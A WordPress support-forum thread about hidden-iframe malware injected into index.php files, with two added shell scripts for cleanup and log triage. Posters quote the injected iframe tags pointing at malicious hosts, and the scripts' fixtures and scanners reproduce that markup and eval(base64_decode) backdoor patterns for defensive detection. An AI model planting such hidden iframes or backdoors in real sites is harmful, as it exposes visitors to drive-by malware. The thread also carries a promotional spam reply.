iFrame Hack on Several WP Sites

  • Hello –

    This week one of the sites I work on was hacked and an iframe was placed in all index.php files, plus in the functions.php file in the wp-includes folder.

    The specific hack code is:
    <iframe src="http://filmproductionlifemedia.cn:8080/ts/in.cgi?pepsi70" width=125 height=125 style="visibility: hidden"></iframe>

    This code often overwrites the ending php tags in the file and thus brings the site down.

    I have seen a couple of other threads on this (links at bottom), but not exactly the same code example, so wanted to bring it to light here to:

    • Gauge how often it’s happening
    • Share solutions
    • Expose the culprits, if possible
    • Alert WP team so they can review possible core level security measures

    As to remedies and security measures to take, the other threads have given some good advice, and I plan to sweep my machine and those of other team members with FTP access (there could be a virus attached to our systems), check recent plugins, scan for viruses on the hosting servers, and change all relevant security codes and settings. I will report again here, and encourage you to do the same.

    Here are the other useful threads I have found:

    – Scott

Viewing 15 replies - 16 through 30 (of 38 total)
  • whooami

    (@whooami)

    Member

    folks…

    please understand that NOT all “iframe hacks” are created equal. Some are potentially wordpress specific but a good deal are not.

    Additionally, it’s a widespread issue: bluehost sites, godaddy sites, hostgator.. you name it, they’ve seen iframe exploits.

    Here’s a few things to consider when trying to determine potential causes:

    Do you have other stuff in your web space besides wordpress? Do files in there have the same iframes? Are multiple files affected? Like ALL files that have the word “index” in them? Or “default”? Or “home”?

    People that write wordpress specific hacks know that the wp-content/index.php doesn’t typically get displayed in a browser, or that index.html in that one plugin’s directory. So those files are not typically changed if it’s wordpress specific.

    On the other hand, gumblar-type attacks,

    http://news.cnet.com/8301-1009_3-10244529-83.html

    write the iframe code to all the index.* files and all the home.* files, regardless of the file’s location.

    If you have THAT sort of problem, you MUST scan any and all local machines that access the site using an ftp client, for malware. MUST MUST MUST. That means your machine at work, etc..

    You MUST change your ftp password.

    And for those of you using Internet cafes or kiosks — bad idea.

    You MUST make sure your local machines are current on their software – and that any security patches have been applied.

    yadda yadda ..

    I’ve written this so many times my fingers are raw.

    http://www.village-idiot.org/archives/2009/06/05/a-rant-about-malware-and-stuff/

    Thanks for such a detailed explanation, whooami.

    I have two FTP accounts, one for WP and the other for vBulletin. I found that both scripts have been attacked by the same iframe. Now I have started to scan my PC for viruses, malware etc. Also, I can’t change the password from cPanel, so I have requested my webhost to allow me to change passwords from now onwards. I will report in here as I proceed.

    If you are having trouble removing the scripts from your pages and/or getting your site back into Google’s good graces, you might want to check out http://www.iframehack.com . Their blog provides quite a bit of information on the hack, including a list of the domains that these hidden iframes are directing traffic to, and provide a service that removes the malicious content from all of the pages on your site that were affected by the virus/trojan and assists with getting the site reincluded in Google results and having the “attack site” label removed.

    Hope this helps someone!

    what the heck.. no advertisement please.

    Help out the community not help yourself

    Hello. I am stuck with the same virus. It places an iframe code connecting to some site called mega-statistic (dot) org

    I use a barely one month old Mac running Leopard (if this helps solve the problem)
    FTP using CyberDuck

    my coders use older Windows based PCs ((if this helps solve the problem))

    my coders ALSO use Ubuntu.

    the code was only found on the index.php of my theme (ndesign studio’s itheme)

    the code is this:

    <iframe src="http://mega-statistic.org/1/in.cgi?2" width="0" height="0" frameborder="0"></iframe>

    The interesting thing is, my server host asked me to place two files called ftp.allow and ftp.deny to restrict FTP access to certain defined IP addresses only. Still this problem happened.

    do you think there is an invisible malware code installer now residing on the server (my root directory et al) itself? what do you guys think?

    Also, I am not a programmer, just a cinematographer, but was wondering if it’s possible to run a small command which will automatically check and clean all the files on my server? Especially since I HAVE identified the line of abusive code?

    almost like a phpBB admin utility?

    would that be a fast way to check the files?

    If you happen to have ssh access, you can remove it using that.
    You’d want to make a backup of your files first just in case something gets messed up, then the command would be something like this:

    find ./public_html/ -type f -exec sed -i 's#<iframe[^>]*mega-statistic\.org[^>]*></iframe>##g' {} \;

    Not all WordPress themes work with every version of WordPress. Yours may have become outdated and should be removed or upgraded.
    Every plugin is different and some of the old ones may cause problems, so make sure you choose recent plugins and only install ones which you need.

    Read the following for tips to assist with cleaning up hackers code and keeping your site more secure:

    http://wordpress.org/support/topic/281767?replies=19
    http://codex.wordpress.org/Hardening_WordPress
    http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/
    http://guvnr.com/web/blogging/10-tips-to-make-wordpress-hack-proof/
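The two things the replies above ask for, whooami’s triage (are only the files WordPress renders hit, or every index.*/home.* placeholder as in a gumblar-type FTP attack?) and bh_WP_fan’s one-line cleanup, as one added example. This is not code from the thread; it assumes a single web root passed as an argument, the two iframe hosts named in this thread, and a constructed sample site built by make_fixture in a temp dir (hypothetical names throughout).

```shell
#!/bin/sh
# Added example, not code from this thread. Triage and clean the hidden-iframe
# injection discussed above. Assumptions (hypothetical): the site lives under one
# web root passed as $1, and the injected hosts are the two named in the thread.
# make_fixture builds a constructed sample site in a temp dir for demonstration.

# Alternation of the iframe hosts seen in this thread (ERE syntax, dots escaped).
IFRAME_HOSTS='filmproductionlifemedia\.cn|mega-statistic\.org'

# Print every file under $1 carrying an <iframe ...> that points at a known host.
# Backups written by clean() end in .bak and are skipped so a re-scan stays honest.
find_infected() {
    grep -rlE "<iframe[^>]*(${IFRAME_HOSTS})" "$1" 2>/dev/null | grep -v '\.bak$' | sort
}

# Files WordPress never renders itself: the "Silence is golden" index.php
# placeholders inside wp-content, any index.htm(l), and home.*/default.* files.
# whooami's point: a WordPress-specific hack leaves them alone, while a gumblar-type
# FTP-credential attack rewrites every index.*/home.* it can reach.
is_placeholder() {
    case "$1" in
        */wp-content/index.php|*/wp-content/plugins/index.php|*/wp-content/themes/index.php) return 0 ;;
        */wp-content/uploads/index.php|*/wp-content/plugins/*/index.php) return 0 ;;
        */home.*|*/default.*|*.htm|*.html) return 0 ;;
        *) return 1 ;;
    esac
}

# Classify the infection under $1 as clean, wp-rendered-only or site-wide.
classify() {
    tmp=$(mktemp)
    find_infected "$1" > "$tmp"
    total=0; placeholders=0
    while IFS= read -r f; do
        total=$((total + 1))
        if is_placeholder "$f"; then placeholders=$((placeholders + 1)); fi
    done < "$tmp"
    rm -f "$tmp"
    if [ "$total" -eq 0 ]; then echo clean
    elif [ "$placeholders" -gt 0 ]; then echo site-wide
    else echo wp-rendered-only
    fi
}

# Strip the injected tag in place, keeping a .bak copy of each file touched.
# The pattern stays inside one <iframe ...></iframe> instead of a greedy ".*",
# so neighbouring markup on the same line survives.
clean() {
    find_infected "$1" | while IFS= read -r f; do
        sed -i.bak -E "s#<iframe[^>]*(${IFRAME_HOSTS})[^>]*>[[:space:]]*</iframe>##g" "$f"
    done
}

# Constructed sample site (not a real compromised host) for trying the functions.
# Mode "wordpress" infects only files WordPress renders; "gumblar" also hits placeholders.
make_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/wp-content/themes/itheme" "$root/wp-content/plugins/akismet"
    inj='<iframe src="http://mega-statistic.org/1/in.cgi?2" width="0" height="0" frameborder="0"></iframe>'
    printf '<?php\nrequire "./wp-blog-header.php";\n?>%s\n' "$inj" > "$root/index.php"
    printf '<?php get_header(); ?>\n%s\n<?php get_footer(); ?>\n' "$inj" > "$root/wp-content/themes/itheme/index.php"
    printf '<?php\n// Silence is golden.\n' > "$root/wp-content/index.php"
    # A legitimate embed must not be touched: its host is not on the list.
    printf '<p><iframe src="http://www.youtube.com/embed/x"></iframe></p>\n' > "$root/about.html"
    if [ "$1" = gumblar ]; then
        printf '<?php\n// Silence is golden.\n%s\n' "$inj" > "$root/wp-content/index.php"
        printf '%s\n' "$inj" > "$root/wp-content/plugins/akismet/index.html"
    fi
    echo "$root"
}

# Usage: sh iframe-triage.sh demo   (or source it and call classify/clean on your web root)
if [ "${1:-}" = demo ]; then
    site=$(make_fixture gumblar)
    echo "before: $(classify "$site")"; find_infected "$site"
    clean "$site"
    echo "after:  $(classify "$site")"
fi
```

A "site-wide" result is the gumblar pattern whooami describes, so the FTP password change and the malware scan of every machine that has used an FTP client against the site come before anything else; "wp-rendered-only" points at the WordPress install, its plugins and theme. Removing the tag does not restore a closing php tag the injection overwrote (the OP’s case), so run php -l over the cleaned .php files afterwards and compare against the .bak copies.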

    Thanks. I am trying to upgrade my WP and the theme as well!

    Thanks to bh_WP_fan. I do not use WordPress, but was looking for a good solution to this problem.

    Got hit by similar iframe attack today.

    Damage:
    1. Got iframe inserts in root index.php (possibly more, quickly overwrote with clean WP install)

    2. Got a hidden and very obscured PHP backdoor in the WP plugins dir, “blog” sub-dir. Check for this, people! I would’ve missed it if I wasn’t very thorough and checking everything a few times – it didn’t show in installed plugins.

    What can I say about method:
    1. There was no FTP involved, FTP log is absolutely clean as far as it goes.
    2. I don’t believe my home PC was compromised (confident me).
    3. I found the actual intrusion in the access log. How it went (as far as I can tell):
    – the hacker came from an online service that looks for sites on the same server (now I am worried about the server having a hole)
    – blog home page loaded
    – wp-login seems typed by hand and suddenly he is in admin
    – manually uploads and activates backdoor plugin
    – briefly checks plugin few hours later from another ip

    Log fragment for those who want to take a look:
    http://dl.getdropbox.com/u/58900/ip.csv

    Weirdest part – it seems the hacker just saw my blog for the first time, no previous visits, no poking around, no bruteforce attempts I can see. He just came by looking for a site on a specific server and somehow just logged in.

    My conclusion – this was purely a WP attack, the hacker made a beeline for the WP login and he knew exactly what he was doing with that plugin.

    Question is – where the heck is the hole, in WP or in the server. 🙁

    Update.

    Today I caught a login attempt from the hacker in exactly the same way; the IP block prevented him from going into admin.

    Half an hour later my database disappeared. 🙁
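Two checks for the intrusion pattern Rarst reconstructs from his access log (a login with no prior browsing, then a plugin upload and activation, and a plugin directory that never shows on the Plugins page), as an added example that is not part of the thread and does not use Rarst’s actual log. It assumes the combined access-log format, the WordPress 2.7+ uploader paths update.php?action=upload-plugin and plugins.php?action=activate, and constructed log lines and plugin files with RFC 5737 test addresses; the function and directory names are hypothetical.

```shell
#!/bin/sh
# Added example, not code from this thread or from Rarst's logs. Two checks for the
# intrusion pattern described above: a login with no prior browsing followed by a
# plugin upload, and a backdoor plugin that never shows on the Plugins page.
# Assumptions (hypothetical): combined access-log format; WordPress 2.7+ paths for
# the plugin uploader (update.php?action=upload-plugin, plugins.php?action=activate).
# The log lines and plugin files below are constructed, using RFC 5737 test addresses.

# Per client IP, flag:
#   login-without-form  POST to wp-login.php with no earlier GET of the form (typed by hand or scripted)
#   plugin-install      plugin upload or activation through wp-admin
#   direct-plugin-file  a .php file under wp-content/plugins requested directly and answered 200
triage_log() {
    awk '
    function add(ip, name) { if (index(flags[ip], name) == 0) flags[ip] = flags[ip] name " " }
    {
        ip = $1
        split($0, q, "\"")              # q[2] = "METHOD PATH PROTO", q[3] = " STATUS BYTES "
        split(q[2], r, " "); method = r[1]; path = r[2]
        split(q[3], s, " "); status = s[1]
        if (path ~ /^\/wp-login\.php/) {
            if (method == "GET") seen_form[ip] = 1
            if (method == "POST" && !(ip in seen_form)) add(ip, "login-without-form")
        }
        if (path ~ /update\.php\?action=upload-plugin/ || path ~ /plugins\.php\?action=activate/) add(ip, "plugin-install")
        if (path ~ /^\/wp-content\/plugins\/.*\.php/ && status == "200") add(ip, "direct-plugin-file")
    }
    END { for (ip in flags) print ip "\t" flags[ip] }' "$1" | sort
}

# Plugin directories with no "Plugin Name:" header never appear on the Plugins page,
# and eval() over a decoder is the usual shape of an obscured backdoor.
scan_plugins() {
    for d in "$1"/wp-content/plugins/*/; do
        [ -d "$d" ] || continue
        name=$(basename "$d")
        if ! grep -rq 'Plugin Name:' "$d"; then echo "$name: no plugin header"; fi
        grep -rlE 'eval[[:space:]]*\([[:space:]]*(base64_decode|gzinflate|gzuncompress|str_rot13)' "$d" \
            | sed "s#^#$name: decoder-eval in #"
    done
}

# Constructed access log: 203.0.113.7 behaves like the intruder in the thread,
# 198.51.100.4 is a normal editor session, 192.0.2.9 later pokes the dropped plugin.
make_sample_log() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
203.0.113.7 - - [10/Jun/2009:14:02:11 +0000] "GET / HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jun/2009:14:02:19 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jun/2009:14:02:20 +0000] "GET /wp-admin/ HTTP/1.1" 200 15011 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jun/2009:14:02:41 +0000] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.1" 200 9011 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jun/2009:14:03:05 +0000] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 3001 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jun/2009:14:03:20 +0000] "GET /wp-admin/plugins.php?action=activate&plugin=blog%2Fblog.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Jun/2009:15:10:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2100 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Jun/2009:15:10:30 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Jun/2009:15:12:00 +0000] "POST /wp-admin/post.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Jun/2009:19:44:02 +0000] "GET /wp-content/plugins/blog/blog.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
EOF
    echo "$f"
}

# Constructed plugin tree: a normal plugin and a headerless "blog" dir with a decoder-eval.
make_plugin_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/wp-content/plugins/akismet" "$root/wp-content/plugins/blog"
    printf '<?php\n/*\nPlugin Name: Akismet\n*/\nfunction akismet_init() {}\n' > "$root/wp-content/plugins/akismet/akismet.php"
    printf '<?php\n$x = "..."; @eval(base64_decode($x));\n' > "$root/wp-content/plugins/blog/blog.php"
    echo "$root"
}

# Usage: sh wp-intrusion-triage.sh demo   (or triage_log /var/log/apache2/access.log; scan_plugins /path/to/site)
if [ "${1:-}" = demo ]; then
    triage_log "$(make_sample_log)"
    scan_plugins "$(make_plugin_fixture)"
fi
```

A successful POST to wp-login.php from an address that never fetched the form is what “typed by hand and suddenly he is in admin” looks like in the log; on its own it is only a lead, since a password manager or a scripted deploy produces the same shape. Combined with an upload-plugin request minutes later from the same address, and a headerless plugin directory on disk, it is the sequence Rarst describes, and the later direct hit on the plugin file from a second address is the “briefly checks plugin few hours later” step.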

    alndavis

    (@alndavis)

    Rarst,

    Is your server on hostgator by any chance?

    @alndavis

    Nope, but there was a similar hack in the same time frame at hostgator. Came up in comments about the situation at my blog.

    As for my situation, support confirmed that the hacker had earlier taken over another site on the server (via an exploit on an outdated WP version) and from there he went cracking whatever else on the server he saw.

    xinfo

    (@xinfo)

    Even I faced this problem. Well, it’s not a WordPress or web hosting company problem, it’s a user system problem.

    The user system has malware.

    1. You have to clean it with Malwarebytes.

    2. And change the password.

    Keep in mind that other themes which are not active on the site are also attacked, so you have to clean all the themes, including the ones that are not active.

    jiekma

    (@jiekma)

    Health, wealth, love of wisdom
    http://jiekma.3homehk.com/

  • The topic ‘iFrame Hack on Several WP Sites’ is closed to new replies.